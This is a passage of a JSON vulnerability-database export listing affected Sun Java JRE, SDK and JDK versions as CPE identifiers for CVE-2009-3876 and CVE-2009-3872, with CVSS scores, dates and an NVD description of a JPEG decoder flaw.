"cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3876", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3876", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in the JPEG JFIF Decoder in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to gain privileges via a crafted image file, aka Bug Id 6862969.", "edition": 6, "cvss3": {}, "published": 
"2009-11-05T16:30:00", "title": "CVE-2009-3872", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3872"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", 
"cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", 
"cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3872", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3872", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", 